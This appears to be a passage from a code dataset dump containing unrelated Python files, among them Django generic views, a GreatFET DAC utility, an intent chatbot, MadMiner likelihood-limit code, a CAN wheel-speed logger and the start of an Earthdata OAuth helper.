","sub_path":"carsim/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"187192414","text":"#!/usr/bin/env python3\n# coding: utf-8\nfrom __future__ import print_function\nimport sys\nimport glob\n\nimport zlib\nimport base64\n\nname = 'symarbit'\ntry:\n name = sys.argv[1]\nexcept:\n pass\n\nifname = glob.glob(name + '.cpython-3*-x86_64-linux-gnu.so')[0]\nofname = name + '.txt'\n\nwith open(ifname, 'rb') as fp:\n zdata = zlib.compress(fp.read())\n\nb64text = base64.b64encode(zdata)\nwrap=78\nlength=len(b64text)\nwith open(ofname, 'wb') as fp:\n idx = 0\n while idx < length:\n fp.write(b64text[idx : idx+wrap] + b'\\n')\n idx += wrap\n #fp.write(b64text)\nprint('GENERATE %s' % ofname)\n","sub_path":"ccxtbot/data2text.py","file_name":"data2text.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"426051729","text":"import warnings\nfrom django.template import loader, RequestContext\nfrom django.http import Http404, HttpResponse\nfrom django.core.xheaders import populate_xheaders\nfrom django.core.paginator import Paginator, InvalidPage\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nwarnings.warn(\n 'Function-based generic views have been deprecated; use class-based views '\n 'instead.', PendingDeprecationWarning\n)\n\n\ndef object_list(request, queryset, paginate_by=None, page=None,\n allow_empty=True, template_name=None, template_loader=loader,\n extra_context=None, context_processors=None,\n template_object_name='object', mimetype=None):\n \"\"\"\n Generic list of objects.\n\n Templates: ``/_list.html``\n Context:\n object_list\n list of objects\n is_paginated\n are the results paginated?\n results_per_page\n number of objects per page (if paginated)\n has_next\n is there a next page?\n has_previous\n is there a prev page?\n page\n the current page\n next\n the next page\n previous\n the previous page\n pages\n number of pages, total\n hits\n number of objects, total\n last_on_page\n the result number of the last of object in the\n object_list (1-indexed)\n first_on_page\n the result number of the first object in the\n object_list (1-indexed)\n page_range:\n A list of the page numbers (1-indexed).\n \"\"\"\n if extra_context is None:\n extra_context = {}\n queryset = queryset._clone()\n if paginate_by:\n paginator = Paginator(queryset, paginate_by,\n allow_empty_first_page=allow_empty)\n if not page:\n page = request.GET.get('page', 1)\n try:\n page_number = int(page)\n except ValueError:\n if page == 'last':\n page_number = paginator.num_pages\n else:\n # Page is not 'last', nor can it be converted to an int.\n raise Http404\n try:\n page_obj = paginator.page(page_number)\n except InvalidPage:\n raise Http404\n c = RequestContext(request, {\n '%s_list' % template_object_name: page_obj.object_list,\n 'paginator': paginator,\n 'page_obj': page_obj,\n 'is_paginated': page_obj.has_other_pages(),\n\n # Legacy template context stuff. 
New templates should use page_obj\n # to access this instead.\n 'results_per_page': paginator.per_page,\n 'has_next': page_obj.has_next(),\n 'has_previous': page_obj.has_previous(),\n 'page': page_obj.number,\n 'next': page_obj.next_page_number(),\n 'previous': page_obj.previous_page_number(),\n 'first_on_page': page_obj.start_index(),\n 'last_on_page': page_obj.end_index(),\n 'pages': paginator.num_pages,\n 'hits': paginator.count,\n 'page_range': paginator.page_range,\n }, context_processors)\n else:\n c = RequestContext(request, {\n '%s_list' % template_object_name: queryset,\n 'paginator': None,\n 'page_obj': None,\n 'is_paginated': False,\n }, context_processors)\n if not allow_empty and len(queryset) == 0:\n raise Http404\n for key, value in extra_context.items():\n if callable(value):\n c[key] = value()\n else:\n c[key] = value\n if not template_name:\n model = queryset.model\n template_name = \"%s/%s_list.html\" % (\n model._meta.app_label,\n model._meta.object_name.lower()\n )\n t = template_loader.get_template(template_name)\n return HttpResponse(t.render(c), mimetype=mimetype)\n\n\ndef object_detail(request, queryset, object_id=None, slug=None,\n slug_field='slug', template_name=None, template_name_field=None,\n template_loader=loader, extra_context=None,\n context_processors=None, template_object_name='object',\n mimetype=None):\n \"\"\"\n Generic detail of an object.\n\n Templates: ``/_detail.html``\n Context:\n object\n the object\n \"\"\"\n if extra_context is None:\n extra_context = {}\n model = queryset.model\n if object_id:\n queryset = queryset.filter(pk=object_id)\n elif slug and slug_field:\n queryset = queryset.filter(**{slug_field: slug})\n else:\n raise AttributeError(\"Generic detail view must be called with either \"\n \"an object_id or a slug/slug_field.\")\n try:\n obj = queryset.get()\n except ObjectDoesNotExist:\n raise Http404(\n \"No %s found matching the query\" % (model._meta.verbose_name)\n )\n if not template_name:\n template_name = \"%s/%s_detail.html\" % (\n model._meta.app_label, model._meta.object_name.lower()\n )\n if template_name_field:\n template_name_list = [getattr(obj, template_name_field), template_name]\n t = template_loader.select_template(template_name_list)\n else:\n t = template_loader.get_template(template_name)\n c = RequestContext(request, {\n template_object_name: obj,\n }, context_processors)\n for key, value in extra_context.items():\n if callable(value):\n c[key] = value()\n else:\n c[key] = value\n response = HttpResponse(t.render(c), mimetype=mimetype)\n populate_xheaders(request, response, model,\n getattr(obj, obj._meta.pk.name))\n return response\n","sub_path":"cbv/views/list_detail.py","file_name":"list_detail.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561376903","text":"import json\nfrom goblet.utils import get_g_dir, nested_update\nimport os\nimport logging\n\nlog = logging.getLogger(\"goblet.config\")\nlog.setLevel(logging.INFO)\n\n\nclass GConfig:\n \"\"\"Config class used to get variables from config.json or from the environment. 
If stage is set at the environment level,\n it will parse the corresponding section in config.json and return those config values"""\n\n def __init__(self, config=None, stage=None):\n self.config = self.get_g_config()\n if config:\n self.config = nested_update(self.config, config)\n self.stage = stage or os.environ.get("STAGE")\n self.validate()\n if self.stage:\n self.config = nested_update(\n self.config, self.config.get("stages", {}).get(self.stage, {})\n )\n\n @staticmethod\n def get_g_config():\n try:\n with open(f"{get_g_dir()}/config.json") as f:\n return json.load(f)\n except FileNotFoundError:\n return {}\n except json.decoder.JSONDecodeError:\n log.info(\n "JSONDecodeError. config.json is not valid. Returning empty config"\n )\n return {}\n\n def __getattr__(self, name):\n if os.environ.get(name):\n return os.environ.get(name)\n attr = self.config.get(name)\n if attr:\n return attr\n return None\n\n def __setattr__(self, name, value):\n if name not in ["config", "stage"]:\n self.config[name] = value\n else:\n super(GConfig, self).__setattr__(name, value)\n\n def write(self):\n with open(f"{get_g_dir()}/config.json", "w") as f:\n f.write(json.dumps(self.config, indent=4))\n\n def validate(self):\n if self.stage and self.stage not in self.config.get("stages"):\n raise ValueError(f"stage {self.stage} not found in config")\n for stage in self.config.get("stages", {}):\n if "function_name" not in self.config["stages"][stage]:\n raise ValueError(f"function_name key missing for stage {stage}")\n","sub_path":"goblet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"322293600","text":"#!/usr/bin/env python3\n#\n# This file is part of GreatFET\n\nfrom __future__ import print_function\n\nimport errno\nimport sys\n\nimport greatfet\nfrom greatfet import GreatFET\nfrom greatfet.utils import log_silent, log_verbose\n\n\ndef main():\n from greatfet.utils import GreatFETArgumentParser\n\n # Set up a simple argument parser.\n parser = GreatFETArgumentParser(description="Utility for experimenting with GreatFET's DAC")\n parser.add_argument('-S', '--set', nargs=1, type=int, help="DAC value to set on ADC0_0 (0-1023)") \n args = parser.parse_args()\n\n log_function = log_verbose if args.verbose else log_silent\n\n try:\n log_function("Trying to find a GreatFET device...")\n device = GreatFET(serial_number=args.serial)\n log_function("{} found. 
(Serial number: {})\".format(device.board_name(), device.serial_number()))\n except greatfet.errors.DeviceNotFoundError:\n if args.serial:\n print(\"No GreatFET board found matching serial '{}'.\".format(args.serial), file=sys.stderr)\n else:\n print(\"No GreatFET board found!\", file=sys.stderr)\n sys.exit(errno.ENODEV)\n\n if args.set:\n set(device, args.set[0])\n\n\ndef set(device, dac_value):\n device.apis.dac.set(dac_value)\n print(\"DAC value set to\", dac_value)\n\nif __name__ == '__main__':\n main()\n","sub_path":"host/greatfet/commands/greatfet_dac.py","file_name":"greatfet_dac.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499307715","text":"import nltk\r\nfrom nltk.stem.lancaster import LancasterStemmer\r\nstemmer = LancasterStemmer()\r\n\r\nimport time\r\nimport numpy\r\nimport tflearn\r\nimport tensorflow \r\nimport random\r\nimport json\r\nimport pickle\r\nimport nemo\r\nimport text as t\r\nimport os,datetime\r\nwith open(\"intents.json\") as file:\r\n data = json.load(file)\r\n\r\n\r\n\"\"\"try:\r\n with open(\"data.pickle\",\"rb\") as f:\r\n words,labels,training,output=pickle.load\r\nexcept:\"\"\"\r\nwords = []\r\nlabels = []\r\ndocs_x = []\r\ndocs_y = []\r\n\r\nfor intent in data[\"intents\"]:\r\n for pattern in intent[\"patterns\"]:\r\n wrds = nltk.word_tokenize(pattern)\r\n words.extend(wrds)\r\n docs_x.append(wrds)\r\n docs_y.append(intent[\"tag\"])\r\n if intent[\"tag\"] not in labels:\r\n labels.append(intent[\"tag\"])\r\n\r\nwords = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\r\nwords = sorted(list(set(words)))\r\n\r\nlabels = sorted(labels)\r\n\r\ntraining = []\r\noutput = []\r\n\r\nout_empty = [0 for _ in range(len(labels))]\r\n\r\nfor x, doc in enumerate(docs_x):\r\n bag = []\r\n\r\n wrds = [stemmer.stem(w.lower()) for w in doc]\r\n\r\n for w in words:\r\n if w in wrds:\r\n bag.append(1)\r\n else:\r\n bag.append(0)\r\n\r\n output_row = out_empty[:]\r\n output_row[labels.index(docs_y[x])] = 1\r\n\r\n training.append(bag)\r\n output.append(output_row)\r\n\r\n\r\ntraining = numpy.array(training)\r\noutput = numpy.array(output)\r\n\"\"\"with open(\"data.pickle\",\"wb\") as f:\r\n pickle.dump((words,labels,training,output),f)\"\"\"\r\ntensorflow.reset_default_graph()\r\n\r\nnet = tflearn.input_data(shape=[None, len(training[0])])\r\nnet = tflearn.fully_connected(net, 8)\r\nnet = tflearn.fully_connected(net, 8)\r\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\r\nnet = tflearn.regression(net)\r\n\r\nmodel = tflearn.DNN(net)\r\n\r\n#try:\r\n# model.load(\"model.tflearn\")\r\n#except:\r\nmodel.fit(training, output, n_epoch=1000, batch_size=8, show_metric=True)\r\nmodel.save(\"model.tflearn\")\r\n\r\ndef bag_of_word(s,words):\r\n bag=[0 for _ in range(len(words))]\r\n\r\n s_words=nltk.word_tokenize(s)\r\n s_words=[stemmer.stem(word.lower()) for word in s_words]\r\n \r\n for se in s_words:\r\n for i ,w in enumerate(words):\r\n if w==se:\r\n bag[i]=1\r\n return numpy.array(bag)\r\n\r\ndef AImain(requiment):\r\n \r\n try:\r\n #requiment=nemo.ask()\r\n if \"open Facebook\" in requiment:\r\n t.open_facebook()\r\n elif \"open Gmail\" in requiment:\r\n t.open_gmail()\r\n elif \"open GitHub\" in requiment:\r\n t.open_github()\r\n elif \"open Wiki\" in requiment:\r\n t.open_wiki()\r\n elif \"song\" in requiment and \"YouTube\" in requiment:\r\n song=requiment.split()\r\n song=song[1:requiment.index(\"song\")]\r\n song=\"\".join(song)\r\n 
t.open_video_on_youtube(song)\r\n elif \"open YouTube\" in requiment:\r\n t.open_youtube()\r\n \r\n elif 'open code' in requiment:\r\n os.startfile(r'C:\\Program Files (x86)\\Sublime Text 3\\sublime_text.exe')\r\n elif 'search' in requiment:\r\n link=b.replace(\"open\",\"\")\r\n t.open_google(link)\r\n elif \"weather in\" in requiment:\r\n data=' '.join(requiment.split()[2:])\r\n weather=nemo.get_weather(data)\r\n print(weather)\r\n nemo.tts(weather)\r\n elif 'film' in requiment:\r\n data=' '.join(requiment.split()[1:requiment.index('flim')])\r\n t.opem_flim(data)\r\n elif 'time' in requiment:\r\n time=str(datetime.datetime.now().hour)+\" and \"+str(datetime.datetime.now().minute)+' minute'\r\n nemo.tts_orther(time,'vi')\r\n except:\r\n pass\r\n \r\ndef chat():\r\n print(\"Start talking with Nemo!...\")\r\n time.sleep(3)\r\n while True:\r\n try:\r\n you_talk=nemo.ask()\r\n print(f\"you:{you_talk}\")\r\n stop=[\"quit\",\"exit\"]\r\n if you_talk.lower() in stop:\r\n break\r\n results=model.predict([bag_of_word(you_talk,words)])\r\n max_index=numpy.argmax(results)\r\n tag=labels[max_index]\r\n for t in data['intents']:\r\n if tag==t[\"tag\"]:\r\n rep=random.choice(t[\"responses\"])\r\n print(f\"bot:{rep}\")\r\n nemo.tts(rep)\r\n AImain(you_talk)\r\n\r\n except:\r\n print(\"say that again,sir\")\r\n nemo.tts(\"say that again,sir\")\r\n\r\n\r\nchat()\r\n","sub_path":"new_nemo.py","file_name":"new_nemo.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"249294955","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport numpy as np\nimport os\nfrom scipy.stats import chi2, poisson\n\nfrom madminer.analysis import DataAnalyzer\nfrom madminer.utils.various import mdot\nfrom madminer.ml import ParameterizedRatioEstimator, Ensemble\nfrom madminer.utils.histo import Histo\nfrom madminer.sampling import SampleAugmenter\nfrom madminer import sampling\nfrom madminer.ml import ScoreEstimator\n\nlogger = logging.getLogger(__name__)\n\n\nclass AsymptoticLimits(DataAnalyzer):\n \"\"\"\n Functions to calculate observed and expected constraints, using asymptotic properties of the likelihood ratio as\n test statistics.\n\n Parameters\n ----------\n filename : str\n Path to MadMiner file (for instance the output of `madminer.delphes.DelphesProcessor.save()`).\n\n include_nuisance_parameters : bool, optional\n If True, nuisance parameters are taken into account. 
Default value: False.\n \"\"\"\n\n def __init__(self, filename=None, include_nuisance_parameters=False):\n super(AsymptoticLimits, self).__init__(filename, False, include_nuisance_parameters)\n\n def observed_limits(\n self,\n x_observed,\n theta_ranges,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n resolutions=25,\n luminosity=300000.0,\n ):\n theta_grid, p_values, i_ml = self._analyse(\n len(x_observed),\n x_observed,\n theta_ranges,\n resolutions,\n mode,\n model_file,\n hist_vars,\n hist_bins,\n include_xsec,\n None,\n luminosity,\n )\n return theta_grid, p_values, i_ml\n\n def expected_limits(\n self,\n theta_true,\n theta_ranges,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n resolutions=25,\n luminosity=300000.0,\n ):\n x_asimov, x_weights = self._asimov_data(theta_true)\n n_observed = luminosity * self._calculate_xsecs([theta_true])[0]\n theta_grid, p_values, i_ml = self._analyse(\n n_observed,\n x_asimov,\n theta_ranges,\n resolutions,\n mode,\n model_file,\n hist_vars,\n hist_bins,\n include_xsec,\n x_weights,\n luminosity,\n )\n return theta_grid, p_values, i_ml\n\n def asymptotic_p_value(self, log_likelihood_ratio):\n q = -2.0 * log_likelihood_ratio\n p_value = chi2.sf(x=q, df=self.n_parameters)\n return p_value\n\n def _analyse(\n self,\n n_events,\n x,\n theta_ranges,\n theta_resolutions,\n mode=\"ml\",\n model_file=None,\n hist_vars=None,\n hist_bins=20,\n include_xsec=True,\n obs_weights=None,\n luminosity=300000.0,\n ):\n logger.debug(\"Calculating p-values for %s expected events\", n_events)\n\n # Observation weights\n if obs_weights is None:\n obs_weights = np.ones(len(x))\n obs_weights /= np.sum(obs_weights)\n obs_weights = obs_weights.astype(np.float64)\n\n # Theta grid\n theta_grid = self._make_theta_grid(theta_ranges, theta_resolutions)\n\n # Kinematic part\n if mode == \"rate\":\n log_r_kin = 0.0\n elif mode == \"ml\":\n assert model_file is not None\n logger.info(\"Loading kinematic likelihood ratio estimator\")\n model = self._load_ratio_model(model_file)\n\n logger.info(\"Calculating kinematic log likelihood ratio with estimator\")\n log_r_kin = self._calculate_log_likelihood_ratio_kinematics(x, theta_grid, model)\n log_r_kin = log_r_kin.astype(np.float64)\n log_r_kin = self._clean_nans(log_r_kin)\n logger.debug(\"Raw mean -2 log r: %s\", np.mean(-2.0 * log_r_kin, axis=1))\n log_r_kin = n_events * np.sum(log_r_kin * obs_weights[np.newaxis, :], axis=1)\n logger.debug(\"Rescaled -2 log r: %s\", -2.0 * log_r_kin)\n\n elif mode == \"histo\":\n if hist_vars is not None:\n logger.info(\"Setting up standard summary statistics\")\n summary_function = self._make_summary_statistic_function(\"observables\", observables=hist_vars)\n elif model_file is not None:\n logger.info(\"Loading score estimator and setting it up as summary statistics\")\n model = self._load_score_model(model_file)\n summary_function = self._make_summary_statistic_function(\"sally\", model=model)\n else:\n raise RuntimeError(\"For 'histo' mode, either provide histo_vars or model_file!\")\n summary_stats = summary_function(x)\n\n logger.info(\"Creating histogram with %s bins for the summary statistics\", hist_bins)\n histo = self._make_histo(summary_function, hist_bins, theta_grid, theta_resolutions)\n\n logger.info(\"Calculating kinematic log likelihood with histograms\")\n log_r_kin = self._calculate_log_likelihood_histo(summary_stats, theta_grid, histo)\n log_r_kin = log_r_kin.astype(np.float64)\n log_r_kin = 
self._clean_nans(log_r_kin)\n log_r_kin = n_events * np.sum(log_r_kin * obs_weights[np.newaxis, :], axis=1)\n\n else:\n raise ValueError(\"Unknown mode {}, has to be 'ml' or 'histo' or 'xsec'\".format(mode))\n\n # xsec part\n if include_xsec:\n logger.info(\"Calculating rate log likelihood\")\n log_p_xsec = self._calculate_log_likelihood_xsec(n_events, theta_grid, luminosity)\n logger.debug(\"Rate -2 log p: %s\", -2.0 * log_p_xsec)\n else:\n log_p_xsec = 0.0\n\n # Combine and get p-values\n logger.info(\"Calculating p-values\")\n log_r = log_r_kin + log_p_xsec\n logger.debug(\"Combined -2 log r: %s\", -2.0 * log_r)\n log_r, i_ml = self._subtract_ml(log_r)\n logger.debug(\"Min-subtracted -2 log r: %s\", -2.0 * log_r)\n p_values = self.asymptotic_p_value(log_r)\n\n return theta_grid, p_values, i_ml\n\n def _make_summary_statistic_function(self, mode, model=None, observables=None):\n if mode == \"observables\":\n assert observables is not None\n x_indices = self._find_x_indices(observables)\n\n def summary_function(x):\n return x[:, x_indices]\n\n elif mode == \"sally\":\n assert isinstance(model, ScoreEstimator)\n\n def summary_function(x):\n return model.evaluate_score(x)\n\n else:\n raise RuntimeError(\"Unknown mode {}, has to be 'observables' or 'sally'\".format(mode))\n\n return summary_function\n\n @staticmethod\n def _load_ratio_model(filename):\n if os.path.isdir(filename):\n model = Ensemble()\n model.load(filename)\n else:\n model = ParameterizedRatioEstimator()\n model.load(filename)\n return model\n\n @staticmethod\n def _load_score_model(filename):\n if os.path.isdir(filename):\n model = Ensemble()\n model.load(filename)\n else:\n model = ScoreEstimator()\n model.load(filename)\n return model\n\n def _calculate_xsecs(self, thetas, test_split=0.2):\n # Test split\n start_event, end_event = self._train_test_split(False, test_split)\n\n # Total xsecs for benchmarks\n xsecs_benchmarks = 0.0\n for observations, weights in self.event_loader(start=start_event, end=end_event):\n xsecs_benchmarks += np.sum(weights, axis=0)\n\n # xsecs at thetas\n xsecs = []\n for theta in thetas:\n theta_matrix = self._get_theta_benchmark_matrix(theta)\n xsecs.append(mdot(theta_matrix, xsecs_benchmarks))\n return np.asarray(xsecs)\n\n def _asimov_data(self, theta, test_split=0.2):\n start_event, end_event = self._train_test_split(False, test_split)\n x, weights_benchmarks = next(self.event_loader(start=start_event, end=end_event, batch_size=None))\n\n theta_matrix = self._get_theta_benchmark_matrix(theta)\n weights_theta = mdot(theta_matrix, weights_benchmarks)\n weights_theta /= np.sum(weights_theta)\n\n return x, weights_theta\n\n @staticmethod\n def _make_theta_grid(theta_ranges, resolutions):\n if isinstance(resolutions, int):\n resolutions = [resolutions for _ in range(theta_ranges)]\n theta_each = []\n for resolution, (theta_min, theta_max) in zip(resolutions, theta_ranges):\n theta_each.append(np.linspace(theta_min, theta_max, resolution))\n theta_grid_each = np.meshgrid(*theta_each)\n theta_grid_each = [theta.flatten() for theta in theta_grid_each]\n theta_grid = np.vstack(theta_grid_each).T\n return theta_grid\n\n def _make_histo(self, summary_function, x_bins, theta_grid, theta_bins, n_samples_per_theta=1000):\n logger.info(\"Building histogram with %s bins per parameter and %s bins per observable\")\n histo = Histo(theta_bins, x_bins)\n theta, x = self._make_histo_data(theta_grid, n_samples_per_theta * len(theta_grid))\n summary_stats = summary_function(x)\n histo.fit(theta, summary_stats, 
fill_empty_bins=True)\n return histo\n\n def _make_histo_data(self, thetas, n_samples, test_split=0.2):\n sampler = SampleAugmenter(self.madminer_filename, include_nuisance_parameters=self.include_nuisance_parameters)\n x, theta, _ = sampler.sample_train_plain(\n theta=sampling.morphing_points(thetas),\n n_samples=n_samples,\n test_split=test_split,\n filename=None,\n folder=None,\n )\n return theta, x\n\n def _find_x_indices(self, observables):\n x_names = list(self.observables.keys())\n x_indices = []\n for obs in observables:\n try:\n x_indices.append(x_names.index(obs))\n except ValueError:\n raise RuntimeError("Unknown observable {}, has to be one of {}".format(obs, x_names))\n logger.debug("Using x indices %s", x_indices)\n return x_indices\n\n @staticmethod\n def _calculate_log_likelihood_histo(x, theta_grid, histo):\n log_p = []\n for theta in theta_grid:\n log_p.append(histo.log_likelihood(theta, x))\n log_p = np.asarray(log_p)\n return log_p\n\n def _calculate_log_likelihood_xsec(self, n_observed, theta_grid, luminosity=300000.0):\n n_observed_rounded = int(np.round(n_observed, 0))\n n_predicted = self._calculate_xsecs(theta_grid) * luminosity\n logger.debug("Observed events: %s", n_observed)\n logger.debug("Expected events: %s", n_predicted)\n log_p = poisson.logpmf(k=n_observed_rounded, mu=n_predicted)\n return log_p\n\n def _calculate_log_likelihood_ratio_kinematics(self, x_observed, theta_grid, model, theta1=None):\n if isinstance(model, ParameterizedRatioEstimator):\n log_r, _ = model.evaluate_log_likelihood_ratio(\n x=x_observed, theta=theta_grid, test_all_combinations=True, evaluate_score=False\n )\n elif isinstance(model, Ensemble) and model.estimator_type == "parameterized_ratio":\n log_r, _ = model.evaluate_log_likelihood_ratio(\n x=x_observed,\n theta=theta_grid,\n test_all_combinations=True,\n evaluate_score=False,\n calculate_covariance=False,\n )\n else:\n raise NotImplementedError(\n "Likelihood ratio estimation is currently only implemented for "\n "ParameterizedRatioEstimator instances"\n )\n return log_r\n\n @staticmethod\n def _subtract_ml(log_r):\n i_ml = np.argmax(log_r)\n log_r_subtracted = log_r[:] - log_r[i_ml]\n return log_r_subtracted, i_ml\n\n @staticmethod\n def _clean_nans(array):\n not_finite = np.any(~np.isfinite(array), axis=0)\n if np.sum(not_finite) > 0:\n logger.warning("Removing %s inf / nan results from calculation", np.sum(not_finite))\n array[:, not_finite] = 0.0\n return array\n\n def _train_test_split(self, train, test_split):\n """\n Returns the start and end event for train samples (train = True) or test samples (train = False).\n\n Parameters\n ----------\n train : bool\n True if training data is generated, False if test data is generated.\n\n test_split : float\n Fraction of events reserved for testing.\n\n Returns\n -------\n start_event : int\n Index of the first unweighted event to consider.\n\n end_event : int\n Index of the last unweighted event to consider.\n\n """\n if train:\n start_event = 0\n\n if test_split is None or test_split <= 0.0 or test_split >= 1.0:\n end_event = None\n else:\n end_event = int(round((1.0 - test_split) * self.n_samples, 0))\n if end_event < 0 or end_event > self.n_samples:\n raise ValueError("Irregular train / test split: sample {} / {}", end_event, self.n_samples)\n\n else:\n if test_split is None or test_split <= 0.0 or test_split >= 1.0:\n start_event = 0\n else:\n start_event = int(round((1.0 - test_split) * self.n_samples, 0)) + 1\n if start_event < 0 or start_event > self.n_samples:\n raise 
ValueError(\"Irregular train / test split: sample {} / {}\", start_event, self.n_samples)\n\n end_event = None\n\n return start_event, end_event\n","sub_path":"madminer/limits.py","file_name":"limits.py","file_ext":"py","file_size_in_byte":13890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405409171","text":"import json\n\ndef getReportGeneralbyLeader(mysql):\n try:\n response = {}\n cur = mysql.connection.cursor()\n cur.execute(\"\"\"SELECT V.id_voter, CONCAT(V.names, ' ',V.last_names), V.document, V.phone, V.address_show, C.city, V.voting_table, CONCAT(L.names, ' ',L.last_names)\n FROM voters as V INNER JOIN citys as C ON V.id_city = C.id_city INNER JOIN users as L ON V.id_leader = L.id_user\n \"\"\")\n data = cur.fetchall()\n if cur.rowcount > 0:\n result = {}\n cant = 0\n for row in data:\n print (row)\n result[row[0]] = { \"id_voter\":row[0], \"name_voter\": row[1], \"document\": row[2], \"phone\": row[3], \"address_show\": row[4], \"city\": row[5], \"voting_table\": row[6], \"name_leader\": row[7] }\n cant = cant+1\n\n response[\"code\"] = 200\n response[\"data\"][\"quantity\"] = cant\n response[\"data\"] = json.dumps(result)\n else:\n response[\"code\"] = 204\n cur.close()\n return response\n except:\n print(\"Error getGeneralbyLeader\")\n return ({\"code\":409})\n\n# def getCitybyId(mysql,id_city):\n# try:\n# response = {}\n# cur = mysql.connection.cursor()\n# sql = \"SELECT id_city, city FROM citys WHERE id_city = %s\"\n# cur.execute(sql, (id_city,))\n# data = cur.fetchall()\n# if cur.rowcount > 0:\n# result = {}\n# for row in data:\n# print (row)\n# result[row[0]] = { \"id_city\":row[0], \"city\": row[1] }\n\n# response[\"code\"] = 200\n# response[\"data\"] = json.dumps(result)\n# else:\n# response[\"code\"] = 204\n# print(response)\n# cur.close()\n# return response\n# except:\n# print(\"Error getCitybyId\")\n# return ({\"code\":409})\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555674063","text":"#\n# Speed logger - PriusCAN\n# AVT ADAS & Autonomy Team, Fall 2019\n#\n\nfrom common.corebus.corebus import CoreBus\nfrom common.utils.debugprint import DebugPrint as dp\nfrom common.can.interface import CANInterface as cif\n\n# Initialize app and CoreBus:\ndp.debugPrint(\"Wheel speed logger\", \"init\")\nappCoreBus = CoreBus().connection\n\n# Set CAN interface socket and DBC filename here:`\ncanInterface = cif(\"can0\", \"toyota_prius.dbc\")\nsock = canInterface.sock\n\n# Primary loop\nwhile(True):\n\n # Keep on listening for CAN packets:\n packet = sock.recv(72)\n\n # Try to decode wheel speed\n wheelSpeedDecoded = canInterface.decode(packet = packet, filter_id_hex = \"0x0aa\")\n if(wheelSpeedDecoded != False):\n # Individual wheel speeds\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.front.right\", float(wheelSpeedDecoded[\"WHEEL_SPEED_FR\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.front.left\", float(wheelSpeedDecoded[\"WHEEL_SPEED_FL\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.rear.right\", float(wheelSpeedDecoded[\"WHEEL_SPEED_RR\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.rear.left\", float(wheelSpeedDecoded[\"WHEEL_SPEED_RL\"]))\n appCoreBus.set(\"vehicle.core.sensor.wheelspeed.updated\", canInterface.getCurrentTimestamp())\n\n # Try to decode composite speed\n speedDecoded = canInterface.decode(packet = packet, filter_id_hex = 
\"0x0b4\")\n if(speedDecoded != False):\n # Individual wheel speeds\n appCoreBus.set(\"vehicle.core.sensor.speed\", float(speedDecoded[\"SPEED\"]))\n appCoreBus.set(\"vehicle.core.sensor.speed.updated\", speedDecoded.getCurrentTimestamp())\n","sub_path":"speed.py","file_name":"speed.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135331928","text":"\nimport logging\nimport os\nimport re\nimport urllib\nfrom time import time\nfrom json import loads\n\nfrom .view_util import make_set_cookie_headers_jwt, get_exp_time, JWT_COOKIE_NAME\nfrom .aws_util import retrieve_secret\n\n\nlog = logging.getLogger(__name__)\n\n\ndef get_base_url(ctxt=False):\n # Make a redirect url using optional custom domain_name, otherwise use raw domain/stage provided by API Gateway.\n try:\n return 'https://{}/'.format(\n os.getenv('DOMAIN_NAME', '{}/{}'.format(ctxt['domainName'], ctxt['stage'])))\n except (TypeError, IndexError) as e:\n log.error('could not create a redirect_url, because {}'.format(e))\n raise\n\n\ndef get_redirect_url(ctxt=False):\n return '{}login'.format(get_base_url(ctxt))\n\n\ndef do_auth(code, redirect_url):\n\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/oauth/token\"\n\n # App U:P from URS Application\n auth = get_urs_creds()['UrsAuth']\n\n post_data = {\"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": redirect_url}\n\n headers = {\"Authorization\": \"BASIC \" + auth}\n post_data_encoded = urllib.parse.urlencode(post_data).encode(\"utf-8\")\n post_request = urllib.request.Request(url, post_data_encoded, headers)\n\n t0 = time()\n try:\n log.debug('headers: {}'.format(headers))\n log.debug('url: {}'.format(url))\n log.debug('post_data: {}'.format(post_data))\n\n response = urllib.request.urlopen(post_request) #nosec URL is *always* URS.\n t1 = time()\n packet = response.read()\n log.debug('ET to do_auth() urlopen(): {} sec'.format(t1 - t0))\n log.debug('ET to do_auth() request to URS: {} sec'.format(time() - t0))\n return loads(packet)\n\n except urllib.error.URLError as e:\n log.error(\"Error fetching auth: {0}\".format(e))\n log.debug('ET for the attempt: {}'.format(format(round(time() - t0, 4))))\n return {}\n\n\ndef get_urs_url(ctxt, to=False):\n\n base_url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + '/oauth/authorize'\n\n # From URS Application\n client_id = get_urs_creds()['UrsId']\n\n log.debug('domain name: %s' % os.getenv('DOMAIN_NAME', 'no domainname set'))\n log.debug('if no domain name set: 